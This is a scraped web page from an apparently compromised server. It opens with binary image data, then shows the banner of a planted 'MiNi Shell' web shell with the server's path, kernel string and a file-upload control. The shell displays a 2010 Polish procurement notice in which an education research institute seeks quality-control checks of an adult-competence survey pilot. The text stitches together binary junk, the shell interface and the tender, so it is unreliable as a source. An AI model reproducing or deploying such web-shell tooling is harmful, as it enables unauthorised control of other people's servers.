JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100611/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100611/151605-N-2010.html

<p class="kh_header"><b>Warszawa: Przeprowadzenie kontroli jakości pilotażu badania ankietowego kompetencji osób dorosłych</b><br>
<b>Numer ogłoszenia: 151605 - 2010; data zamieszczenia: 11.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Badań Edukacyjnych Ministerstwa Edukacji Narodowej , ul. Górczewska 8, 01-180 Warszawa, woj. mazowieckie, tel. 022 6328091, faks 022 6321895.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ibe.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie kontroli jakości pilotażu badania ankietowego kompetencji osób dorosłych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. PRZEDMIOT ZAMÓWIENIA Przedmiotem zamówienia jest przeprowadzenie kontroli jakości pilotażu badania ankietowego kompetencji osób dorosłych. II. CEL KONTROLI Celem kontroli jest uzyskanie dowodów pozwalających na jednoznaczną ocenę przez Zamawiającego poprawności wykonania pilotażu badania ankietowego umiejętności osób dorosłych realizowanego w ramach umowy z dnia 28.04.2010r. zawartej z firmą GENERAL PROJEKT SP. Z.O.O. z siedzibą w Olsztynie (10-351) przy ul. Żeromskiego 2/2. III. ZAKRES KONTROLI Zakres kontroli obejmuje weryfikację przeprowadzenia danego wywiadu i jego poprawności. Kontrola odbędzie się za pomocą kontaktu telefonicznego lub wizyty osobistej (w zależności od dostępności numeru telefonicznego respondenta) oraz obejmie dostarczone przez Zamawiającego nagrania wywiadów z respondentami. W ramach kontroli jakości Wykonawca jest zobowiązany do weryfikacji przeprowadzenia wywiadów i kontroli ich poprawności na podstawie listy pytań i zadań sprawdzających zgodnie z wytycznymi stanowiącymi załącznik nr 1 do Opisu Przedmiotu Zamówienia. W przypadku gdy w trakcie kontroli zostanie wykryta nieprawidłowość w pracy ankietera polegająca na niezgodności stanu faktycznego ustalonego przez kontrolę z zawartością ankiety przeprowadzonej w ramach pilotażu badania kompetencji osób dorosłych, zakres kontroli może zostać rozszerzony na wszystkie wywiady przeprowadzone przez tego ankietera. O rozszerzeniu zakresu kontroli decyduje wyłącznie Zamawiający, co oznacza, że Wykonawca nie może uchylić się od przeprowadzenia kontroli w zakresie wymaganym przez Zamawiającego. Kontrolę musi cechować bezstronność przez co Zamawiający rozumie, że kontrola będzie przeprowadzona przez Wykonawcę niezależnego od podmiotu realizującego pilotaż badania umiejętności kompetencji osób dorosłych. W szczególności Wykonawca ubiegający się o udzielenie zamówienia publicznego lub inna osoba uczestnicząca w czynnościach kontrolnych jemu zleconych narusza zasadę bezstronności, jeżeli: 1) posiada udziały i akcje lub inne tytuły własności w podmiocie realizującym badanie umiejętności kompetencji osób dorosłych lub w jednostce z nim stowarzyszonej, dominującej, zależnej lub współzależnej; 2) jest lub była w ostatnich 3 latach przedstawicielem prawnym (pełnomocnikiem), członkiem organów nadzorczych bądź zarządzających podmiotu realizującego badanie kompetencji umiejętności osób dorosłych lub pracownikiem jednostki z nią stowarzyszonej, dominującej, zależnej lub współzależnej; 3) uczestniczył bądź uczestniczy w realizacji umowy z dnia 28.04.2010r. w sprawie badania kompetencji umiejętności osób dorosłych zawartej z GENERAL PROJEKT SP. Z.O.O. jako wykonawca podwykonawca itp. ; 4) jest małżonkiem, krewnym lub powinowatym w linii prostej do drugiego stopnia lub jest związany z tytułu opieki, przysposobienia podmiotu realizującego badanie kompetencji umiejętności osób dorosłych Wykonawcy; 5) był lub jest w okresie ostatnich 3 lat pracownikiem lub współpracownikiem General Projekt sp. z o.o., choćby w sposób pośredni, tzn. wykonywała czynności na rzecz General Projekt sp. z o.o. za pośrednictwem innego podmiotu lub podmiotów. 6) zachodzą okoliczności tego rodzaju, które mogą wywołać uzasadnioną wątpliwość co do jej bezstronności. IV. HARMONOGRAM I ZASADY PRZEPROWADZENIA KONTROLI Harmonogram i zasady przeprowadzenia kontroli jakości pilotażu badania ankietowego kompetencji osób dorosłych: 1. Kontrola będzie obejmować sprawdzenie 10% wielkości próby pilotażu badania ankietowego kompetencji osób dorosłych. Pilotaż badania zostanie przeprowadzony w terminie 25.05-15.07.2010 z możliwością przedłużenia do 31.07.2010, na próbie 3600 osób z operatu PESEL. Siatka ankieterska obejmuje około 100 osób. Każdy ankieter pilotażu Badania przeprowadzi nie więcej niż 2 wywiady dziennie i nie więcej niż 40 w miesiącu. Badanie składa się z kwestionariusza osobowego, testu komputerowego i części kognitywnej. 2. Kontrola będzie obejmować wszystkie przypadki wylosowane przez Zamawiającego i stanowiące jednocześnie 10% wielkości próby, o której mowa w pkt 1 z zastrzeżeniem pkt. 5. Próba do kontroli będzie obejmować wszystkie 16 województw i zostanie wylosowana w 48 miastach i 28 gminach wiejskich. W każdym mieście (gminie wiejskiej) dobrane będą przynajmniej 4 osoby. 3. Kontrola zostanie przeprowadzona w 2 etapach: a. Zebranie informacji od respondentów pilotażu badania kompetencji osób dorosłych przez ankieterów kontroli; b. Zestawienie ustaleń kontroli przeprowadzonej przez ankieterów kontroli z danymi zebranymi w pilotażu badania, o którym mowa w pkt 1. Zestawienie to będzie wykonane przez kontrolerów. 4. Kontrola zostanie też przeprowadzona na podstawie nagrań wywiadów (nie więcej niż 200). 5. W wypadku wykrycia nieprawidłowości w pracy ankietera pilotażu badania, o którym mowa w pkt 1., Zamawiający może zlecić Wykonawcy sprawdzenie wszystkich wywiadów przeprowadzonych przez tego ankietera, wywiady te zostaną sprawdzone niezależnie od pozostałych przypadków, o których mowa w pkt 2. 6. Dodatkowe wywiady, o których mowa w pkt 5 zwiększają liczbę przypadków, o których mowa w pkt. 2. 7. Wykonawca rozpocznie kontrolę jakości w dniu podpisania umowy na realizację kontroli. 8. Wykonawca zakończy kontrolę wywiadów w terminie: nie później niż 14 dni po zakończeniu pilotażu badania, o którym mowa w pkt 1. 9. Wykonawca zakończy kontrolę nagrań wywiadów w terminie: nie później niż 5 tygodni po zakończeniu pilotażu badania, o którym mowa w pkt 1. 10. Do przeprowadzenia kontroli jakości badania, o którym mowa w pkt 1, Zamawiający dostarczy Wykonawcy: a. w dniu podpisania umowy - wstępną bazę danych osób do zbadania pod kątem kontroli jakości; b. w dniu podpisania umowy - listę pytań i zadań sprawdzających; c. sukcesywnie w miarę realizacji badania - listę przypadków do kontroli z wstępnej bazy danych wraz z danymi zebranymi w ramach pilotażu badania, o którym mowa w pkt 1 ; d. 3 tygodnie po zakończeniu pilotażu badania, o którym mowa w pkt 1.- nagrania przeprowadzonych wywiadów w liczbie nie większej niż 200; e. w przypadku wykrycia nieprawidłowości w pracy danego ankietera - listę wszystkich przeprowadzonych przez niego wywiadów do dodatkowej kontroli. 11. Zespół projektowy będzie się składał co najmniej z: a. 1 koordynatora projektu - odpowiedzialnego za nadzór nad realizacją kontroli oraz kontakty z Zamawiającym; b. 5 osób, z których część będzie pełniła rolę kontrolerów odpowiedzialnych za zestawienie danych zebranych w pilotażu badania, o którym mowa w pkt 1 z danymi uzyskanymi w trakcie kontroli, a pozostałe osoby będą pełnić rolę ankieterów kontroli odpowiedzialnych za przeprowadzenie kontroli bezpośrednio z respondentami pilotażu badania ankietowego kompetencji osób dorosłych. Role te nie mogą być wymienne, a dane zebrane w pilotażu , o którym mowa w pkt 1 (i przekazane przez Zamawiającego) nie mogą być znane ankieterom kontroli za wyjątkiem danych adresowych. 12. Raportowanie wyników kontroli przez Wykonawcę a. Raporty z postępu prac będą przekazywane Zamawiającemu w formie elektronicznej i według wytycznych Zamawiającego w odstępach nie dłuższych niż tydzień. b. Na zakończenie projektu, Wykonawca przedstawi w formie elektronicznej i według wytycznych Zamawiającego raport zbiorczy ze wszystkich etapów kontroli. c. Wykonawca zobowiązuje się także dostarczyć wszystkie dokumenty i informacje, które uzyskał w trakcie kontroli. 13. Szczegółowe wytyczne dotyczące przeprowadzenia kontroli i jej raportowania stanowią załącznik nr 1 do Opisu przedmiotu zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.31.30.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 04.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy posiadają niezbędną wiedzę 
i doświadczenie tzn. wykażą zrealizowanie a w przypadku świadczeń okresowych lub ciągłych wykonywanie, w okresie ostatnich 3 lat, przed upływem terminu składania ofert co najmniej 3 badań sondażowych polegających na bezpośrednim kontakcie ankietera z respondentem (face to face) o liczbie przeprowadzonych wywiadów w każdym z tych badań nie mniejszej niż 1000 wraz z załączeniem dokumentów potwierdzających należyte wykonanie w/w usług. W przypadku, gdy o zamówienie ubiegają się Wykonawcy występujący wspólnie ww. warunek muszą spełniać łącznie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy dysponują odpowiednimi osobami zdolnymi do wykonania zamówienia tzn.: 1) dysponują co najmniej 1 osobą, która będzie pełniła w trakcie realizacji zamówienia funkcję Koordynatora Projektu, która legitymuje się wykształceniem wyższym i biegłą znajomością języka polskiego w mowie i piśmie oraz posiada doświadczenie w koordynowaniu (nadzór nad realizacją) kontroli jakości w co najmniej 3 badaniach sondażowych, polegających na bezpośrednim kontakcie ankietera z respondentem (face to face), przeprowadzonych za pomocą wywiadów CAPI na próbie nie mniejszej niż 1000 dla każdego z tych badań; 2) dysponują co najmniej 5 osobami, które będą pełnić w trakcie realizacji zamówienia funkcję Kontrolera albo ankietera kontroli, które legitymują się biegłą znajomością języka polskiego w mowie i piśmie, z których każda posiada doświadczenie w przeprowadzaniu kontroli jakości w co najmniej 3 badaniach sondażowych, polegających na bezpośrednim kontakcie ankietera z respondentem (face to face), przeprowadzonych za pomocą wywiadów CAPI. W przypadku, gdy o zamówienie ubiegają się Wykonawcy występujący wspólnie ww. warunki muszą spełniać łącznie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 ust. 1 ustawy z dnia 29.01.2004 r. prawo zamówień publicznych /Dz.U. z 2007r. nr 223, poz. 1655 z późn. zm./ przewiduje możliwość zmiany umowy w sprawie udzielenia zamówienia publicznego w następującym zakresie: - zmiana wynagrodzenia w związku ze zmianą obowiązującej stawki podatku od towarów i usług; - Zamawiający ma prawo wydłużyć termin realizacji umowy do 30 dni.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ibe.edu.pl/bip<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Górczewska 8, 01-180 Warszawa. Nr faksu: 022 241 71 23..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.06.2010 godzina 15:00, miejsce: Oferty winny być złożone w Sekretariacie Instytutu Badań Edukacyjnych, który mieści się w Warszawie (01-180) przy ul. Górczewskiej 8 (pokój nr 79).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia jest realizowany w ramach projektu: Badanie jakości i efektywności edukacji oraz instytucjonalizacja zaplecza badawczego- współfinansowanego z Europejskiego Funduszu Społecznego, w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet III-Wysoka jakość systemu oświaty, Działanie 3.1- Modernizacja systemu nadzoru i zarządzania w oświacie, 3.1.1- Tworzenie warunków do monitorowania ewaluacji i badań systemu oświaty..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com